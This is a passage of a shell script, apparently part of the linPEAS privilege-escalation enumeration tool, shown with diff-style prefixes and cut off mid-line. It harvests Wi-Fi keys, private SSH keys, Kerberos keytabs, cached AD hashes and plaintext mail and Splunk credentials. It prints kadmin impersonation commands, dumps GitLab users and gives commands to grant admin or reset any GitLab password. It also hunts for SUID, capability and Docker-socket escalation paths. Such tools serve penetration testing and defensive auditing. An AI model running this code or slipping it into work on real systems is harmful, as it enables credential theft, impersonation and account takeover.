peass{Drupal} - - peass{Moodle} - - peass{Supervisord} - - peass{Cesi} - - peass{Rsync} - - peass{Hostapd} - - #-- SI) Wifi conns - print_2title "Searching wifi conns file" - wifi=$(find /etc/NetworkManager/system-connections/ -type f 2>/dev/null) - if [ "$wifi" ]; then - printf "%s\n" "$wifi" | while read f; do echo "$f"; cat "$f" 2>/dev/null | grep "psk.*=" | sed "s,psk.*,${SED_RED},"; done - else echo_not_found - fi - echo "" - - peass{Anaconda ks} - - peass{VNC} - - peass{Ldap} - - peass{OpenVPN} - - #-- SI) ssh files - print_2title "Searching ssl/ssh files" - if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=$(grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null); fi - sshconfig="$(ls /etc/ssh/ssh_config 2>/dev/null)" - hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)" - hostsallow="$(ls /etc/hosts.allow 2>/dev/null)" - - peass{SSH} - - grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED}," - - if [ "$TIMEOUT" ]; then - privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) - privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null) - privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null) - privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null) - else - privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout - privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null) - fi - - if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then - echo "" - print_3title "Possible private SSH keys were found!" | sed -${E} "s,private SSH keys,${SED_RED}," - if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -${E} "s,.*,${SED_RED},"; fi - if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E} "s,.*,${SED_RED},"; fi - if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -${E} "s,.*,${SED_RED},"; fi - if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${SED_RED},"; fi - echo "" - fi - if [ "$certsb4_grep" ] || [ "$PSTORAGE_CERTSBIN" ]; then - print_3title "Some certificates were found (out limited):" - printf "$certsb4_grep\n" | head -n 20 - printf "$$PSTORAGE_CERTSBIN\n" | head -n 20 - echo "" - fi - if [ "$PSTORAGE_CERTSCLIENT" ]; then - print_3title "Some client certificates were found:" - printf "$PSTORAGE_CERTSCLIENT\n" - echo "" - fi - if [ "$PSTORAGE_SSH_AGENTS" ]; then - print_3title "Some SSH Agent files were found:" - printf "$PSTORAGE_SSH_AGENTS\n" - echo "" - fi - if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then - print_3title "Listing SSH Agents" - ssh-add -l - echo "" - fi - if [ "$PSTORAGE_SSH_CONFIG" ]; then - print_3title "Some home ssh config file was found" - printf "%s\n" "$PSTORAGE_SSH_CONFIG" | while read f; do ls "$f" | sed -${E} "s,$f,${SED_RED},"; cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,User|ProxyCommand,${SED_RED},"; done - echo "" - fi - if [ "$hostsdenied" ]; then - print_3title "/etc/hosts.denied file found, read the rules:" - printf "$hostsdenied\n" - cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN}," - echo "" - fi - if [ "$hostsallow" ]; then - print_3title "/etc/hosts.allow file found, trying to read the rules:" - printf "$hostsallow\n" - cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED}," - echo "" - fi - if [ "$sshconfig" ]; then - echo "" - echo "Searching inside /etc/ssh/ssh_config for interesting info" - grep -v "^#" /etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED}," - fi - echo "" - - #-- SI) PAM auth - print_2title "Searching unexpected auth lines in /etc/pam.d/sshd" - pamssh=$(grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth) - if [ "$pamssh" ]; then - grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - echo "" - - #-- SI) NFS exports - print_2title "NFS exports?" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe" - if [ "$(cat /etc/exports 2>/dev/null)" ]; then grep -v "^#" /etc/exports 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,no_root_squash|no_all_squash ,${SED_RED_YELLOW}," | sed -${E} "s,insecure,${SED_RED}," - else echo_not_found "/etc/exports" - fi - echo "" - - #-- SI) Kerberos - print_2title "Searching kerberos conf files and tickets" - print_info "http://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-active-directory" - kadmin_exists="$(command -v kadmin)" - klist_exists="$(command -v klist)" - if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi - if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi - ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" - if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0), you might find tickets inside processes memory" | sed "s,is disabled,${SED_RED},g"; - else echo "ptrace protection is enabled ($ptrace_scope), you need to disable it to search for tickets inside processes memory" | sed "s,is enabled,${SED_GREEN},g"; - fi - - printf "%s\n" "$PSTORAGE_KERBEROS" | while read f; do - if [ -r "$f" ]; then - if echo "$f" | grep -q .k5login; then - echo ".k5login file (users with access to the user who has this file in his home)" - cat "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" - elif echo "$f" | grep -q keytab; then - echo "" - echo "keytab file found, you may be able to impersonate some kerberos principals and add users or modify passwords" - klist -k "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" - printf "$(klist -k $f 2>/dev/null)\n" | awk '{print $2}' | while read l; do - if [ "$l" ] && echo "$l" | grep -q "@"; then - printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${SED_RED},g" - #kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid - #We could also try to create a new user or modify a password, but I'm not user if linpeas should do that - fi - done - elif echo "$f" | grep -q krb5.conf; then - ls -l "$f" - cat "$f" 2>/dev/null | sed -${E} "s,default_ccache_name,${SED_RED},"; - elif echo "$f" | grep -q kadm5.acl; then - ls -l "$f" - cat "$f" 2>/dev/null - elif echo "$f" | grep -q sssd.conf; then - ls -l "$f" - cat "$f" 2>/dev/null | sed -${E} "s,cache_credentials ?= ?[tT][rR][uU][eE],${SED_RED},"; - elif echo "$f" | grep -q secrets.ldb; then - echo "You could use SSSDKCMExtractor to extract the tickets stored here" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"; - ls -l "$f" - elif echo "$f" | grep -q .secrets.mkey; then - echo "This is the secrets file to use with SSSDKCMExtractor" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"; - ls -l "$f" - fi - fi - done - ls -l "/tmp/krb5cc*" "/var/lib/sss/db/ccache_*" "/etc/opt/quest/vas/host.keytab" 2>/dev/null || echo_not_found "tickets kerberos" - klist 2>/dev/null || echo_not_found "klist" - echo "" - - peass{Knockd} - - peass{Kibana} - - peass{Elasticsearch} - - ##-- SI) Logstash - print_2title "Searching logstash files" - if [ "$PSTORAGE_LOGSTASH" ]; then - printf "$PSTORAGE_LOGSTASH\n" - printf "%s\n" "$PSTORAGE_LOGSTASH" | while read d; do - if [ -r "$d/startup.options" ]; then - echo "Logstash is running as user:" - cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed -${E} "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,root,${SED_RED}," - fi - cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${SED_RED}," - cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${SED_RED}," - done - else echo_not_found - fi - echo "" - - #-- SI) Vault-ssh - print_2title "Searching Vault-ssh files" - if [ "$PSTORAGE_VAULT_SSH_HELPER" ]; then - printf "$PSTORAGE_VAULT_SSH_HELPER\n" - printf "%s\n" "$PSTORAGE_VAULT_SSH_HELPER" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done - echo "" - vault secrets list 2>/dev/null - printf "%s\n" "$PSTORAGE_VAULT_SSH_TOKEN" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null - else echo_not_found "vault-ssh-helper.hcl" - fi - echo "" - - #-- SI) Cached AD Hashes - adhashes=$(ls "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null) - print_2title "Searching AD cached hashes" - if [ "$adhashes" ]; then - ls -l "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null - else echo_not_found "cached hashes" - fi - echo "" - - #-- SI) Screen sessions - print_2title "Searching screen sessions" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" - screensess=$(screen -ls 2>/dev/null) - if [ "$screensess" ]; then - printf "$screensess" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m," - else echo_not_found "screen" - fi - echo "" - - #-- SI) Tmux sessions - tmuxdefsess=$(tmux ls 2>/dev/null) - tmuxnondefsess=$(ps auxwww | grep "tmux " | grep -v grep) - print_2title "Searching tmux sessions"$N - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" - if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ]; then - printf "$tmuxdefsess\n$tmuxnondefsess\n" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m," - else echo_not_found "tmux" - fi - echo "" - - peass{CouchDB} - - peass{Redis} - - #-- SI) Dovecot - # Needs testing - print_2title "Searching dovecot files" - dovecotpass=$(grep -r "PLAIN" /etc/dovecot 2>/dev/null) - if [ -z "$dovecotpass" ]; then - echo_not_found "dovecot credentials" - else - for d in $(grep -r "PLAIN" /etc/dovecot 2>/dev/null); do - df=$(echo $d |cut -d ':' -f1) - dp=$(echo $d |cut -d ':' -f2-) - echo "Found possible PLAIN text creds in $df" - echo "$dp" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null - done - fi - echo "" - - peass{Mosquitto} - - peass{Neo4j} - - peass{Cloud Credentials} - - peass{Cloud Init} - - peass{CloudFlare} - - peass{Erlang} - - peass{GMV Auth} - - peass{IPSec} - - peass{IRSSI} - - peass{Keyring} - - peass{Filezilla} - - peass{Backup Manager} - - ##-- SI) passwd files (splunk) - print_2title "Searching uncommon passwd files (splunk)" - SPLUNK_BIN="$(command -v splunk 2>/dev/null)" - if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi - printf "%s\n" "$PSTORAGE_SPLUNK" | sort | uniq | while read f; do - if [ -f "$f" ] && ! [ -x "$f" ]; then - echo "passwd file: $f" | sed "s,$f,${SED_RED}," - cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E} "s,password|pass|user|database|host|\$,${SED_RED}," - fi - done - echo "" - - print_2title "Analyzing kcpassword files" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#kcpassword" - printf "%s\n" "$PSTORAGE_KCPASSWORD\n" | while read f; do - echo "$f" | sed -${E} "s,.*,${SED_RED}," - base64 "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - done - echo "" - - ##-- SI) Gitlab - print_2title "Searching GitLab related files" - #Check gitlab-rails - if [ "$(command -v gitlab-rails)" ]; then - echo "gitlab-rails was found. Trying to dump users..." - gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${SED_RED}," - echo "If you have enough privileges, you can make an account under your control administrator by running: gitlab-rails runner 'user = User.find_by(email: \"youruser@example.com\"); user.admin = TRUE; user.save!'" - echo "Alternatively, you could change the password of any user by running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\"); user.password = \"pass_peass_pass\"; user.password_confirmation = \"pass_peass_pass\"; user.save!'" - echo "" - fi - if [ "$(command -v gitlab-backup)" ]; then - echo "If you have enough privileges, you can create a backup of all the repositories inside gitlab using 'gitlab-backup create'" - echo "Then you can get the plain-text with something like 'git clone \@hashed/19/23/14348274[...]38749234.bundle'" - echo "" - fi - #Check gitlab files - printf "%s\n" "$PSTORAGE_GITLAB" | sort | uniq | while read f; do - if echo $f | grep -q secrets.yml; then - echo "Found $f" | sed "s,$f,${SED_RED}," - cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" - elif echo $f | grep -q gitlab.yml; then - echo "Found $f" | sed "s,$f,${SED_RED}," - cat "$f" | grep -A 4 "repositories:" - elif echo $f | grep -q gitlab.rb; then - echo "Found $f" | sed "s,$f,${SED_RED}," - cat "$f" | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,email|user|password,${SED_RED}," - fi - echo "" - done - echo "" - - peass{Github} - - peass{Svn} - - peass{PGP-GPG} - - peass{Cache Vi} - - peass{Wget} - - ##-- SI) containerd installed - print_2title "Checking if containerd(ctr) is available" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation" - containerd=$(command -v ctr) - if [ "$containerd" ]; then - echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," - ctr image list - fi - echo "" - - ##-- SI) runc installed - print_2title "Checking if runc is available" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation" - runc=$(command -v runc) - if [ "$runc" ]; then - echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," - fi - echo "" - - #-- SI) Docker - print_2title "Searching docker files (limit 70)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket" - printf "%s\n" "$PSTORAGE_DOCKER" | head -n 70 | while read f; do - ls -l "$f" 2>/dev/null - if ! [ "$IAMROOT" ] && [ -S "$f" ] && [ -w "$f" ]; then - echo "Docker socket file ($f) is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - fi - done - echo "" - - peass{Firefox} - - peass{Chrome} - - peass{Autologin} - - #-- SI) S/Key athentication - print_2title "S/Key authentication" - if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q skey; then - printf "System supports$RED S/Key$NC authentication\n" - if ! [ -d /etc/skey/ ]; then - echo "${GREEN}S/Key authentication enabled, but has not been initialized" - elif ! [ "$IAMROOT" ] && [ -w /etc/skey/ ]; then - echo "${RED}/etc/skey/ is writable by you" - ls -ld /etc/skey/ - else - ls -ld /etc/skey/ 2>/dev/null - fi - fi - echo "" - - #-- SI) YubiKey athentication - print_2title "YubiKey authentication" - if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q yubikey; then - printf "System supports$RED YubiKey$NC authentication\n" - if ! [ "$IAMROOT" ] && [ -w /var/db/yubikey/ ]; then - echo "${RED}/var/db/yubikey/ is writable by you" - ls -ld /var/db/yubikey/ - else - ls -ld /var/db/yubikey/ 2>/dev/null - fi - fi - echo "" - - #-- SI) Passwords inside pam.d - print_2title "Passwords inside pam.d" - grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED}," - echo "" - - - - peass{SNMP} - - peass{Pypirc} - - peass{Postfix} - - peass{Ldaprc} - - peass{Env} - - peass{Msmtprc} - - peass{Keepass} - - peass{FTP} - - peass{EXTRA_SECTIONS} - - peass{Interesting logs} - - peass{Windows Files} - - peass{Other Interesting Files} - - echo "" - - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - -if echo $CHECKS | grep -q IntFiles; then - ########################################### - #----------) Interesting files (----------# - ########################################### - print_title "Interesting Files" - - ##-- IF) SUID - print_2title "SUID - Check easy privesc, exploits and write perms" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" - if ! [ "$STRINGS" ]; then - echo_not_found "strings" - fi - if ! [ "$STRACE" ]; then - echo_not_found "strace" - fi - suids_files=$(find / -perm -4000 -type f ! -path "/dev/*" 2>/dev/null) - for s in $suids_files; do - s=$(ls -lahtr "$s") - #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder - if echo "$s" | grep -qE "^total"; then break; fi - - sname="$(echo $s | awk '{print $9}')" - if [ "$sname" = "." ] || [ "$sname" = ".." ]; then - true #Don't do nothing - elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then - echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) - echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - c="a" - for b in $sidB; do - if echo $s | grep -q $(echo $b | cut -d % -f 1); then - echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," - c="" - break; - fi - done; - if [ "$c" ]; then - if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then - echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," - else - echo "$s (Unknown SUID binary)" | sed -${E} "s,/.*,${SED_RED}," - printf $ITALIC - if ! [ "$FAST" ] && [ "$STRINGS" ]; then - $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do - sline_first="$(echo "$sline" | cut -d ' ' -f1)" - if echo "$sline_first" | grep -qEv "$cfuncs"; then - if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path - if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n" - fi - else #If not a path - if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n" - fi - fi - fi - done - if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && ! [ "$NOTEXPORT" ] && [ -x "$sname" ]; then - printf $ITALIC - echo "----------------------------------------------------------------------------------------" - echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." - OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH - export LD_LIBRARY_PATH="" - timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" - printf $NC - export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH - echo "----------------------------------------------------------------------------------------" - echo "" - fi - fi - fi - fi - fi - done; - echo "" - - - ##-- IF) SGID - print_2title "SGID" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" - sgids_files=$(find / -perm -2000 -type f ! -path "/dev/*" 2>/dev/null) - for s in $sgids_files; do - s=$(ls -lahtr "$s") - #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder - if echo "$s" | grep -qE "^total";then break; fi - - sname="$(echo $s | awk '{print $9}')" - if [ "$sname" = "." ] || [ "$sname" = ".." ]; then - true #Don't do nothing - elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then - echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) - echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - c="a" - for b in $sidB; do - if echo "$s" | grep -q $(echo $b | cut -d % -f 1); then - echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," - c="" - break; - fi - done; - if [ "$c" ]; then - if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then - echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," - else - echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED}," - printf $ITALIC - if ! [ "$FAST" ] && [ "$STRINGS" ]; then - $STRINGS "$sname" | sort | uniq | while read sline; do - sline_first="$(echo $sline | cut -d ' ' -f1)" - if echo "$sline_first" | grep -qEv "$cfuncs"; then - if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path - if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" - fi - else #If not a path - if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n" - fi - fi - fi - done - if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then - printf "$ITALIC" - echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." - timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" - printf "$NC" - echo "" - fi - fi - fi - fi - fi - done; - echo "" - - ##-- IF) Misconfigured ld.so - print_2title "Checking misconfigurations of ld.so" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so" - printf $ITALIC"/etc/ld.so.conf\n"$NC; - cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - cat /etc/ld.so.conf 2>/dev/null | while read l; do - if echo "$l" | grep -q include; then - ini_path=$(echo "$l" | cut -d " " -f 2) - fpath=$(dirname "$ini_path") - if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - for f in $fpath/*; do - printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - done - fi - done - echo "" - - ##-- IF) Capabilities - print_2title "Capabilities" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" - echo "Current capabilities:" - (capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${SED_RED_YELLOW}," ) || echo_not_found "capsh" - (cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status" - echo "" - echo "Shell capabilities:" - (capsh --decode=0x"$(cat /proc/$PPID/status 2>/dev/null | grep CapEff | awk '{print $2}')" 2>/dev/null) || echo_not_found "capsh" - (cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status" - echo "" - echo "Files with capabilities (limited to 50):" - getcap -r / 2>/dev/null | head -n 50 | while read cb; do - capsVB_vuln="" - - for capVB in $capsVB; do - capname="$(echo $capVB | cut -d ':' -f 1)" - capbins="$(echo $capVB | cut -d ':' -f 2)" - if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then - echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW}," - capsVB_vuln="1" - break - fi - done - - if ! [ "$capsVB_vuln" ]; then - echo "$cb" | sed -${E} "s,$capsB,${SED_RED}," - fi - - if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then - echo "$cb is writable" | sed -${E} "s,.*,${SED_RED}," - fi - done - echo "" - - ##-- IF) Users with capabilities - print_2title "Users with capabilities" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" - if [ -f "/etc/security/capability.conf" ]; then - grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - else echo_not_found "/etc/security/capability.conf" - fi - echo "" - - ##-- IF) Files with ACLs - print_2title "Files with ACLs (limited to 50)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls" - ( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - - if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$(command -v getfacl)" ]; then #Find ACL files in macos (veeeery slow) - ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - fi - echo "" - - ##-- IF) Files with ResourceFork - #if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then # TOO SLOW, CHECK IT LATER - # print_2title "Files with ResourceFork" - # print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#resource-forks-or-macos-ads" - # find $HOMESEARCH -type f -exec ls -ld {} \; 2>/dev/null | grep -E ' [x\-]@ ' | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork" - #fi - #echo "" - - ##-- IF) .sh files in PATH - print_2title ".sh files in path" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path" - echo $PATH | tr ":" "\n" | while read d; do - for f in $(find "$d" -name "*.sh" 2>/dev/null); do - if ! 